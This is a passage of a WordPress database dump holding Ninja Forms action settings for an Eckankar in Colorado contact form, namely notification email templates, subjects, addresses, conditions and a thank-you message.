lType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1123,43,'payment_gateways','','payment_gateways',''),(1124,43,'payment_total','0','payment_total','0'),(1125,43,'tag','','tag',''),(1126,43,'email_message_plain','','email_message_plain',''),(1127,43,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(1128,43,'submitter_email','','submitter_email',''),(1129,43,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(1130,43,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(1131,43,'set_subs_to_expire','0','set_subs_to_expire','0'),(1132,43,'subs_expire_time','90','subs_expire_time','90'),(1133,43,'parent_id','11','parent_id','11'),(1134,44,'title','','title',''),(1135,44,'key','','key',''),(1136,44,'type','email','type','email'),(1137,44,'active','1','active','1'),(1138,44,'created_at','2018-01-03 11:44:03','created_at','2018-01-03 11:44:03'),(1139,44,'date_updated','2016-01-19','date_updated','2016-01-19'),(1140,44,'from_name','Colorado Springs Initiators and ESAâs','from_name','Colorado Springs Initiators and ESAâs'),(1141,44,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1142,44,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(1143,44,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(1144,44,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Colorado Springs Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for theÂ <em>Colorado Springs Leadership Organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_118}Â {field:lastname_119}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_118}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_119}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_120}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_121}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_122}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166439207}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_126}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Colorado Springs Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for theÂ <em>Colorado Springs Leadership Organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_118}Â {field:lastname_119}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_118}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_119}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_120}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_121}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_122}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166439207}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_126}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(1145,44,'attach_csv','0','attach_csv','0'),(1146,44,'email_format','html','email_format','html'),(1147,44,'reply_to','','reply_to',''),(1148,44,'cc','','cc',''),(1149,44,'bcc','','bcc',''),(1150,44,'redirect_url','','redirect_url',''),(1151,44,'success_msg','','success_msg',''),(1152,44,'label','Admin Email','label','Admin Email'),(1153,44,'objectType','Action','objectType','Action'),(1154,44,'objectDomain','actions','objectDomain','actions'),(1155,44,'editActive','','editActive',''),(1156,44,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1157,44,'payment_gateways','','payment_gateways',''),(1158,44,'payment_total','0','payment_total','0'),(1159,44,'tag','','tag',''),(1160,44,'email_message_plain','','email_message_plain',''),(1161,44,'drawerDisabled','','drawerDisabled',''),(1162,44,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(1163,44,'parent_id','11','parent_id','11'),(1164,45,'title','','title',''),(1165,45,'key','','key',''),(1166,45,'type','save','type','save'),(1167,45,'active','1','active','1'),(1168,45,'created_at','2018-01-03 11:42:54','created_at','2018-01-03 11:42:54'),(1169,45,'label','Save Form','label','Save Form'),(1170,45,'objectType','Action','objectType','Action'),(1171,45,'objectDomain','actions','objectDomain','actions'),(1172,45,'editActive','','editActive',''),(1173,45,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1174,45,'payment_gateways','','payment_gateways',''),(1175,45,'payment_total','0','payment_total','0'),(1176,45,'tag','','tag',''),(1177,45,'to','{wp:admin_email}','to','{wp:admin_email}'),(1178,45,'reply_to','','reply_to',''),(1179,45,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1180,45,'email_message','{fields_table}','email_message','{fields_table}'),(1181,45,'email_message_plain','','email_message_plain',''),(1182,45,'from_name','','from_name',''),(1183,45,'from_address','','from_address',''),(1184,45,'email_format','html','email_format','html'),(1185,45,'cc','','cc',''),(1186,45,'bcc','','bcc',''),(1187,45,'redirect_url','','redirect_url',''),(1188,45,'parent_id','12','parent_id','12'),(1189,46,'title','','title',''),(1190,46,'key','','key',''),(1191,46,'type','email','type','email'),(1192,46,'active','1','active','1'),(1193,46,'created_at','2018-01-03 11:42:53','created_at','2018-01-03 11:42:53'),(1194,46,'date_updated','2016-01-15','date_updated','2016-01-15'),(1195,46,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(1196,46,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1197,46,'to','{field:email_35}','to','{field:email_35}'),(1198,46,'email_subject','Colorado Springs Leadership Communications','email_subject','Colorado Springs Leadership Communications'),(1199,46,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_33},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Colorado Springs Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_33}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_34}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_35}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_36}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_37}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_40}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_41}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<p>If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org</p><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_33},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Colorado Springs Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_33}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_34}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_35}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_36}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_37}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_40}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_41}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<p>If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org</p><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(1200,46,'attach_csv','0','attach_csv','0'),(1201,46,'email_format','html','email_format','html'),(1202,46,'reply_to','','reply_to',''),(1203,46,'cc','','cc',''),(1204,46,'bcc','','bcc',''),(1205,46,'redirect_url','','redirect_url',''),(1206,46,'success_msg','','success_msg',''),(1207,46,'label','Send copy to user','label','Send copy to user'),(1208,46,'objectType','Action','objectType','Action'),(1209,46,'objectDomain','actions','objectDomain','actions'),(1210,46,'editActive','','editActive',''),(1211,46,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1212,46,'payment_gateways','','payment_gateways',''),(1213,46,'payment_total','0','payment_total','0'),(1214,46,'tag','','tag',''),(1215,46,'email_message_plain','','email_message_plain',''),(1216,46,'parent_id','12','parent_id','12'),(1217,47,'title','','title',''),(1218,47,'key','','key',''),(1219,47,'type','successmessage','type','successmessage'),(1220,47,'active','1','active','1'),(1221,47,'created_at','2018-01-03 11:42:53','created_at','2018-01-03 11:42:53'),(1222,47,'date_updated','2016-01-15','date_updated','2016-01-15'),(1223,47,'from_name','','from_name',''),(1224,47,'from_address','','from_address',''),(1225,47,'to','{wp:admin_email}','to','{wp:admin_email}'),(1226,47,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1227,47,'email_message','{fields_table}','email_message','{fields_table}'),(1228,47,'attach_csv','0','attach_csv','0'),(1229,47,'email_format','html','email_format','html'),(1230,47,'reply_to','','reply_to',''),(1231,47,'cc','','cc',''),(1232,47,'bcc','','bcc',''),(1233,47,'redirect_url','','redirect_url',''),(1234,47,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>'),(1235,47,'label','Success Message','label','Success Message'),(1236,47,'objectType','Action','objectType','Action'),(1237,47,'objectDomain','actions','objectDomain','actions'),(1238,47,'editActive','','editActive',''),(1239,47,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1240,47,'payment_gateways','','payment_gateways',''),(1241,47,'payment_total','0','payment_total','0'),(1242,47,'tag','','tag',''),(1243,47,'email_message_plain','','email_message_plain',''),(1244,47,'parent_id','12','parent_id','12'),(1245,48,'title','','title',''),(1246,48,'key','','key',''),(1247,48,'type','email','type','email'),(1248,48,'active','1','active','1'),(1249,48,'created_at','2018-01-03 11:42:54','created_at','2018-01-03 11:42:54'),(1250,48,'date_updated','2016-01-19','date_updated','2016-01-19'),(1251,48,'from_name','Colorado Springs Leadership Communications','from_name','Colorado Springs Leadership Communications'),(1252,48,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1253,48,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(1254,48,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(1255,48,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br 